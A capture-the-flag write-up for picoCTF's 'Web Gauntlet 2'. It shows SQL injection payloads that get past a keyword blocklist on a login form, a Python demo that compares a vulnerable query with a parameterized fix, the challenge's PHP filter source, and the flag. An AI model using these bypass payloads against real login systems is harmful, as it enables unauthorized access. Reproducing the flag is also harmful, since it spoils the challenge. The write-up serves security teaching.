
Web Gauntlet 2

Category - Web Exploitation

Author - MADSTACKS

Description:

This website looks familiar... Log in as admin
Site: http://mercury.picoctf.net:26215/
Filter: http://mercury.picoctf.net:26215/filter.php

Solution:

The challenge gives us a link to a webpage that lets us log in with a username and password, and we can deduce that both fields are vulnerable to SQL injection. Looking at the filter link we can see which strings we must avoid when crafting our injection.

We know that the username must be "admin", but unfortunately that word is filtered. To bypass this we can use the SQL string-concatenation operator "||", giving a final value for the username field of "ad'||'min".

For the password field we simply need an expression that evaluates to true. The most common one is "' OR '1'='1", but both OR and "=" are filtered, as seen in the filter.php file. Instead we can build a true condition using IS or IS NOT, such as "a' IS NOT 'b", which is also true but uses nothing on the filter list.

Final values for login:

username: ad'||'min
password: a' IS NOT 'b
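To make the point of the writeup concrete from the defender's side, here is an added example (not part of the original writeup or the picoCTF challenge code) that reproduces the two logins against an in-memory SQLite database. It assumes the challenge builds its query by string concatenation into single-quoted fields, which the writeup implies but does not show, and reuses the filter list from the page's filter.php. The second function shows the fix: with bound parameters the same inputs are plain data and no blocklist is needed.

```python
import sqlite3

# Filter list copied from the challenge's filter.php (case-insensitive substring match assumed).
FILTER = ["or", "and", "true", "false", "union", "like", "=", ">", "<",
          ";", "--", "/*", "*/", "admin"]


def make_db():
    """Constructed sample database: one admin row with a password the user does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery-staple')")
    return conn


def passes_filter(value):
    """Blocklist check in the style of the challenge: reject any input containing a filtered token."""
    lowered = value.lower()
    return not any(token in lowered for token in FILTER)


def login_concat(conn, username, password):
    """Vulnerable login (assumed query shape): the filter runs, then the input is spliced into SQL.

    '||' is SQLite's string concatenation, so 'ad'||'min' becomes 'admin', and
    a' IS NOT 'b yields (password='a') IS NOT 'b', which is always true.
    """
    if not (passes_filter(username) and passes_filter(password)):
        return None
    sql = (f"SELECT username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_prepared(conn, username, password):
    """Fixed login: parameters are bound, so quotes and operators in the input are literal text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concat  :", login_concat(db, "ad'||'min", "a' IS NOT 'b"))    # admin
    print("prepared:", login_prepared(db, "ad'||'min", "a' IS NOT 'b"))  # None
```

Note that the blocklist also rejects the legitimate username "admin", so it both fails to stop the injection and breaks a real login; a parameterized query has neither problem.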

Using these to log in we get the message "Congrats! You won! Check out filter.php". Finally, reloading the http://mercury.picoctf.net:26215/filter.php page gives us this source code, which contains the flag:

<?php
session_start();

if (!isset($_SESSION["winner2"])) {
    $_SESSION["winner2"] = 0;
}
$win = $_SESSION["winner2"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");

if ($win === 0) {
    $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
    if ($view) {
        echo "Filters: ".implode(" ", $filter)."<br/>";
    }
} else if ($win === 1) {
    if ($view) {
        highlight_file("filter.php");
    }
    $_SESSION["winner2"] = 0;        // <- Don't refresh!
} else {
    $_SESSION["winner2"] = 0;
}

// picoCTF{0n3_m0r3_t1m3_fc0f841ee8e0d3e1f479f1a01a617ebb}
?>

Note: If you successfully ran the SQL injection but still see nothing in filter.php, try clearing the cache and reloading, or use a different browser, to get the source code with the flag.

Flag:

picoCTF{0n3_m0r3_t1m3_fc0f841ee8e0d3e1f479f1a01a617ebb}